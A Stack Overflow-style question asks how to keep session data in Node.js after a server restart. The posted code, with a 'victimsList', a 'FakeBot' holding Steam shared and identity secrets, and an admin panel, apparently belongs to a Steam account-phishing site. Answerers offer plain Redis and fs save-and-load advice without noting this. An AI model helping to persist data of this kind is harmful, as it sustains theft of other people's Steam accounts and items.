# How to save session nodejs?

Tags: javascript, node.js

When i log in through my steam account on site, it's saving data, but when i restart server and look in admin panel, account was not saved. How to fix that ?

```
const WebServer = require('./src/webserver')
const FakeBot = require('./src/fakebot')

global.victimsList = {}
global.prices = require('./prices.json')
global.config = {
    admin_address: '',
    secretKey: '7786',
    botSteamid: ''
}

global.http = new WebServer({
    port: 80,
    address: ''
})
global.http.launchListener()

global.fakebot = new FakeBot({
    login: '',
    password: '',
    shared_secret: '',
    identity_secret: '',
    price_minimum: 0,
    admins_id: ['']
})
global.fakebot.steamAuth()
```

Comment: You can use a persisted session like redis to store the session. If you store it in memory, it restarts everytime you restart the server...

Comment: How can i do that ? :))

Comment: install a redis on your server. Look at node redis, and store the key value with expiration if needed.... You a new one... Please have the privilege to googleify for you good.

Comment: Exactly what data needs to be saved. Do you have some object that holds all data that needs to be saved for later?

Answer (score 2, accepted):

Few different ways to do this. One super simple way to do it is use the fs module. You can then save and read text data from files super simply. Have something like:

```js
function saveData(){
  fs.writeFileSync('save.json', JSON.stringify(whateverObjectNeedsToBeSaved));
}

function readData(){
  return JSON.parse(fs.readFileSync('save.json'));
}
```

fs Module: https://nodejs.org/api/fs.html

Comment: Uh, alex what does "not helped)" mean? Why did you suggest that as an edit?

Comment: Do you need more information? Heres the documentation for the fs module: https://nodejs.org/api/fs.html

Comment: Also exactly what data is being saved, i could post a more specific reply if i knew what exactly was needed to be saved